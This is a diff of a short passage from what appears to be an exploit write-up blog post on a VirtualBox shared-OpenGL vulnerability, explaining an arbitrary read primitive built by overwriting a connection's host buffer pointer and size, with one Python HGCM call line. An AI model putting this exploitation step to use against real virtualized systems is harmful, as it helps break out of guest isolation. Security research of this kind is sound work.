TheOfficialFloW/TheOfficialFloW.github.io/_posts/2019-04-26-chromacity.md

 #### Arbitrary read primitive

 When issuing a `SHCRGL_GUEST_FN_READ` command, the data from `pHostBuffer` will be sent back to guest.
-Using our custom 0x13371337 ID at offset `OFFSET_CONN_HOSTBUF` and `OFFSET_CONN_HOSTBUFSZ`, we can overwrite this pointer and its corresponding size with custom ones.
+Using our custom 0x13371337 ID, we can overwrite this pointer and its corresponding size with custom ones.
 Then, we send the `SHCRGL_GUEST_FN_READ` message using the `self.client2` client to trigger our arbitrary read (this is the client ID of the leaked `CRConnection`):

 ```python
 hgcm_call(self.client, SHCRGL_GUEST_FN_WRITE_BUFFER, [0x13371337, 0x290, OFFSET_CONN_HOSTBUF,   pack("<Q", where)])